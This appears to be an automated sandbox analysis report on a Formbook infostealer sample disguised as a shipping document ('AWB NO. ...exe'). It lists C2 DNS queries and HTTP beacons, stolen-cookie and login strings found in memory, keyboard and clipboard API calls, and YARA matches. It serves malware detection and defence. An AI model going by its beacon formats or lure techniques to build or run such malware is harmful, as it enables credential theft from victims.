            Source: global trafficHTTP traffic detected: GET /ieqg/?vX=xOYzP3dXeV68t5l1tdRGSaa1OFHMEwYl9QyrCyFOBp5kwxTuFOJ28A7LPoPnjOnXE6vKLrR6BAa5LOtmMQtvuaXLo91Bunju73veWhfgD7rjWCO2fFDcACU=&_B7=LxyxWrj8kri0gh HTTP/1.1Host: www.olhadeputat.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /ouk5/?vX=PLWVRijYnvzxBPZV68lDWez5n1m4qNxygDOUEJJl7paGkoFy8irkxF+ePmZFSckDR+ltzcYQPDsLLRino9E0Pe5jqCKxYTXxZRA6KSseMdymxDABailrF38=&_B7=LxyxWrj8kri0gh HTTP/1.1Host: www.voupeclients.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /fzbg/?vX=uTYyZSOtPBVL0hIsKgpi95HQtVEr7RxE1GtfhiQgzt00yp3pQHZ/yduqmfXPDQ0x8hM1I2y7MNxQRHVIE3PkPDlbAMuSsvV/gP9PT/eZTJpyk9nI4JynE2g=&_B7=LxyxWrj8kri0gh HTTP/1.1Host: www.fundraiserstuffies.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /12kg/?vX=FNzl8wnE++HPhG206OaKKCmPORssckNSyI+M4a86U0qBkTFFPriGBeWQyCEz+v1Kx2tJcxLpZ/phLMA1BmxsvaSisGFPcKMREi9fCQxgCdocMTbgTC3h6NU=&_B7=LxyxWrj8kri0gh HTTP/1.1Host: www.paliinfra.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /tq5r/?vX=2ahlOPqFbaLRJ59RJMyuJ7IfIQg9pPTz0C4c2znY6LEO/TCdmpUdsfBsLge4LzAAnPKkz9TLh65OzxMJqcN49ZYZ04DS6e4TLs38paEuEBs4iPeVqFZufcc=&_B7=LxyxWrj8kri0gh HTTP/1.1Host: www.selllaptop.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000003722000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000002B62000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.19004125183.0000000039F42000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: .www.linkedin.comTRUE/TRUE13336872580273675bscookie"v=1&202108181112191ce8ca8a-2c8f-4463-8512-6f2d1ae6da93AQFkN2vVMNQ3mpf7d5Ecg6Jz9iVIQMh2" equals www.linkedin.com (Linkedin)
            Source: RpcPing.exe, 00000004.00000003.18807468044.0000000002E99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
            Source: RpcPing.exe, 00000004.00000003.18807468044.0000000002E99000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.19090634161.0000000002E99000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23185487157.0000000002E99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
            Source: global trafficDNS traffic detected: DNS query: www.costmoon.com
            Source: global trafficDNS traffic detected: DNS query: www.6171nvuhb.rent
            Source: global trafficDNS traffic detected: DNS query: www.motorsportgives.com
            Source: global trafficDNS traffic detected: DNS query: www.orthonow.live
            Source: global trafficDNS traffic detected: DNS query: www.adamknoxexperience.com
            Source: global trafficDNS traffic detected: DNS query: www.musiccitysauce.com
            Source: global trafficDNS traffic detected: DNS query: www.lakemontbellevue.com
            Source: global trafficDNS traffic detected: DNS query: www.vintagewins.com
            Source: global trafficDNS traffic detected: DNS query: www.spotluv.xyz
            Source: global trafficDNS traffic detected: DNS query: www.olhadeputat.com
            Source: global trafficDNS traffic detected: DNS query: www.voupeclients.com
            Source: global trafficDNS traffic detected: DNS query: www.fundraiserstuffies.com
            Source: global trafficDNS traffic detected: DNS query: www.marktuana.com
            Source: global trafficDNS traffic detected: DNS query: www.paliinfra.com
            Source: global trafficDNS traffic detected: DNS query: www.t8nia9vkpx.icu
            Source: global trafficDNS traffic detected: DNS query: www.selllaptop.org
            Source: unknownHTTP traffic detected: POST /hqcp/ HTTP/1.1Host: www.6171nvuhb.rentAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: http://www.6171nvuhb.rentReferer: http://www.6171nvuhb.rent/hqcp/Content-Length: 199Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Wed, 03 Jul 2024 15:34:51 GMTServer: Apache
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:35:31 GMTServer: ApacheContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:35:34 GMTServer: ApacheContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:35:37 GMTServer: ApacheContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Wed, 03 Jul 2024 15:35:39 GMTServer: Apache
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:37:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://lakemontbellevue.net/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: _cfuvid=J8TlPgwK.uyiwfHuPH9woqnGDB4R0kvbtowxQTqFaig-1720021065357-0.0.1.1-604800000; path=/; domain=.www.lakemontbellevue.com; HttpOnlyServer: cloudflareCF-RAY: 89d7f5687c802ca3-ORDContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:37:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://lakemontbellevue.net/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: _cfuvid=q78Vdp1Tqcep1iwnGWiwInnpBJxldweYeAbg4IJrKkQ-1720021067938-0.0.1.1-604800000; path=/; domain=.www.lakemontbellevue.com; HttpOnlyServer: cloudflareCF-RAY: 89d7f5793b9861c2-ORDContent-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Wed, 03 Jul 2024 15:37:50 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Expires: Wed, 11 Jan 1984 05:00:00 GMT
            Cache-Control: no-cache, must-revalidate, max-age=0
            Link: <https://lakemontbellevue.net/wp-json/>; rel="https://api.w.org/"
            Vary: Accept-Encoding
            host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
            X-Newfold-Cache-Level: 2
            X-Endurance-Cache-Level: 2
            X-nginx-cache: WordPress
            CF-Cache-Status: DYNAMIC
            Set-Cookie: _cfuvid=QM.78s0mfIAeC4YRoX5T.1X2oVj_9R4U_FraGL8j2lY-1720021070959-0.0.1.1-604800000; path=/; domain=.www.lakemontbellevue.com; HttpOnly
            Server: cloudflare
            CF-RAY: 89d7f589eaa62d25-ORD
            Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Wed, 03 Jul 2024 15:37:53 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Expires: Wed, 11 Jan 1984 05:00:00 GMT
            Cache-Control: no-cache, must-revalidate, max-age=0
            Link: <https://lakemontbellevue.net/wp-json/>; rel="https://api.w.org/"
            Vary: Accept-Encoding
            host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
            X-Newfold-Cache-Level: 2
            X-Endurance-Cache-Level: 2
            X-nginx-cache: WordPress
            CF-Cache-Status: MISS
            Set-Cookie: _cfuvid=GdR6J7M7UyeLSOen6FI8vvmIKiL9UZKbqu7AICoDdbc-1720021073312-0.0.1.1-604800000; path=/; domain=.www.lakemontbellevue.com; HttpOnly
            Server: cloudflare
            CF-RAY: 89d7f59a9da42cf5-ORD
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            expires: Wed, 11 Jan 1984 05:00:00 GMT
            cache-control: no-cache, must-revalidate, max-age=0
            content-type: text/html; charset=UTF-8
            link: <https://vintagewins.com/wp-json/>; rel="https://api.w.org/"
            transfer-encoding: chunked
            content-encoding: br
            vary: Accept-Encoding
            date: Wed, 03 Jul 2024 15:37:59 GMT
            server: LiteSpeed
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            expires: Wed, 11 Jan 1984 05:00:00 GMT
            cache-control: no-cache, must-revalidate, max-age=0
            content-type: text/html; charset=UTF-8
            link: <https://vintagewins.com/wp-json/>; rel="https://api.w.org/"
            transfer-encoding: chunked
            content-encoding: br
            vary: Accept-Encoding
            date: Wed, 03 Jul 2024 15:38:02 GMT
            server: LiteSpeed
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            expires: Wed, 11 Jan 1984 05:00:00 GMT
            cache-control: no-cache, must-revalidate, max-age=0
            content-type: text/html; charset=UTF-8
            link: <https://vintagewins.com/wp-json/>; rel="https://api.w.org/"
            transfer-encoding: chunked
            content-encoding: br
            vary: Accept-Encoding
            date: Wed, 03 Jul 2024 15:38:06 GMT
            server: LiteSpeed
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Wed, 03 Jul 2024 15:38:14 GMT
            Server: Apache
            Content-Length: 16052
            Connection: close
            Content-Type: text/html
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Wed, 03 Jul 2024 15:38:16 GMT
            Server: Apache
            Content-Length: 16052
            Connection: close
            Content-Type: text/html
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Wed, 03 Jul 2024 15:38:19 GMT
            Server: Apache
            Content-Length: 16052
            Connection: close
            Content-Type: text/html
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Wed, 03 Jul 2024 15:38:22 GMT
            Server: Apache
            Content-Length: 16052
            Connection: close
            Content-Type: text/html; charset=utf-8
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Wed, 03 Jul 2024 15:38:28 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            X-Powered-By: ASP.NET
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D1KfYUODC9rRl6oCVbOiEn1Atas4taJDBfsZofnl3UtmUkX%2BOwItBL%2BE76nNUUAhQbRYxewhwV%2BXKcUw%2BV6Ki85DEBAA1TnKZArLh4pmhQWZXkTcAO2WRvSWipnUgql6V4kb%2Btvi"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 89d7f6751bd389ec-ORD
            Content-Encoding: gzip
            alt-svc: h3=":443"; ma=86400
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Wed, 03 Jul 2024 15:38:30 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            X-Powered-By: ASP.NET
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p1jK54NQaEt9%2Bv7Nh1F4OqbZfDMN03EodjRGAd5%2BLfRUGpKR9Mvq8Inu5Vb6ltXgHIK5wOiiktP6CR7wXdQnSSl1gKXy2cLwt1PXmywpTc9wf9LanB37zR6aeOBFnpQIjgL6qUkq"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 89d7f685c9e8114d-ORD
            Content-Encoding: gzip
            alt-svc: h3=":443"; ma=86400
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 03 Jul 2024 15:38:33 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | X-Powered-By: ASP.NET | CF-Cache-Status: DYNAMIC | Server: cloudflare | CF-RAY: 89d7f6967c1861bb-ORD | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 03 Jul 2024 15:38:36 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | X-Powered-By: ASP.NET | CF-Cache-Status: DYNAMIC | Server: cloudflare | CF-RAY: 89d7f6a73d6be17c-ORD | alt-svc: h3=":443"; ma=86400
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Content-Length: 626 | Connection: close | Date: Wed, 03 Jul 2024 15:41:21 GMT | Server: Apache
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Date: Wed, 03 Jul 2024 15:41:41 GMT | Server: Apache | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Date: Wed, 03 Jul 2024 15:41:43 GMT | Server: Apache | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Date: Wed, 03 Jul 2024 15:41:46 GMT | Server: Apache | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Content-Length: 626 | Connection: close | Date: Wed, 03 Jul 2024 15:41:49 GMT | Server: Apache
            Source: jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lakemontbellevue.net/#organization
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lakemontbellevue.net/#website
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lakemontbellevue.net/?s=
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lakemontbellevue.net/comments/feed/
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lakemontbellevue.net/feed/
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lakemontbellevue.net/privacy-policy/
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lakemontbellevue.net/wp-content/uploads/2024/05/Lakemont-Logo-1-1.png
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lakemontbellevue.net/wp-content/uploads/2024/05/MacPhersons-Logo.png
            Source: jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lakemontbellevue.net/wp-json/
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lakemontbellevue.net/xmlrpc.php?rsd
            Source: RpcPing.exe, 00000004.00000003.19090634161.0000000002E54000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18795960669.0000000002E54000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18795622494.0000000002E37000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23185487157.0000000002E54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: RpcPing.exe, 00000004.00000003.19090634161.0000000002E54000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18795960669.0000000002E54000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18795622494.0000000002E37000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23185487157.0000000002E54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
            Source: RpcPing.exe, 00000004.00000003.19090634161.0000000002E54000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18795960669.0000000002E54000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18795622494.0000000002E37000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23185487157.0000000002E54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
            Source: jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://macphersonspm.appfolio.com/connect/users/sign_in
            Source: RpcPing.exe, 00000004.00000002.23185424032.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.19092094755.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
            Source: RpcPing.exe, 00000004.00000002.23185424032.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.19092094755.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://schema.org
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://stats.wp.com/e-202427.js
            Source: RpcPing.exe, 00000004.00000002.23189698242.0000000007B82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: RpcPing.exe, 00000004.00000003.18883512956.0000000007B99000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23189698242.0000000007BF0000.00000004.00000020.00020000.00000000.sdmp, 45570IH2.4.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
            Source: RpcPing.exe, 00000004.00000003.18883512956.0000000007B99000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23189698242.0000000007BF0000.00000004.00000020.00020000.00000000.sdmp, 45570IH2.4.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: RpcPing.exe, 00000004.00000002.23189323501.00000000060C0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23187811443.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.000000000361A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: RpcPing.exe, 00000004.00000003.18883512956.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
            Source: 45570IH2.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.monsterinsights.com/
            Source: RpcPing.exe, 00000004.00000002.23187811443.000000000518E000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.00000000045CE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.paliinfra.com/12kg/?vX=FNzl8wnE
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.schema.org/SiteNavigationElement
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_0047425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_00474458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_00460219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_0048CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

            E-Banking Fraud

            Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000002.00000002.18533462079.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.23184804964.0000000002AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.18532632938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.23186298424.00000000050F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.23186502535.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.23186224923.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.18534395996.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.18533462079.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.23184804964.0000000002AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.18532632938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.23186298424.00000000050F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.23186502535.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.23186224923.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.18534395996.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: This is a third-party compiled AutoIt script. 0_2_00403B4C
            Source: AWB NO. 077-57676135055.exe String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: AWB NO. 077-57676135055.exe, 00000000.00000000.18119188502.00000000004B5000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_144c086d-f
